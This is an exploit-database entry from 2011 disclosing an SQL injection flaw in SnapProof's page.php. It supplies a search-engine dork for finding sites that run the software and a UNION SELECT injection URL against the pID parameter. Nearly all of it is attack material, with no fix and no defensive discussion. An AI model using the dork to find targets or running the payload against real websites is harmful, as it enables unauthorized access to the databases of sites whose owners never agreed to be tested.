id: 15519
date: 02/28/2011
title: SnapProof (page.php) SQL Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.snapproof.com/
.:. Dork           : "Created and powered by SnapProof"
####################################################################
 
===[ Exploit ]===
 
www.site.com/page.php?pID=null[Sql]
 
www.site.com/page.php?pID=null+and+1=2+union+select+1,2,3,4
####################################################################



#  0day.today [2023-03-21]  #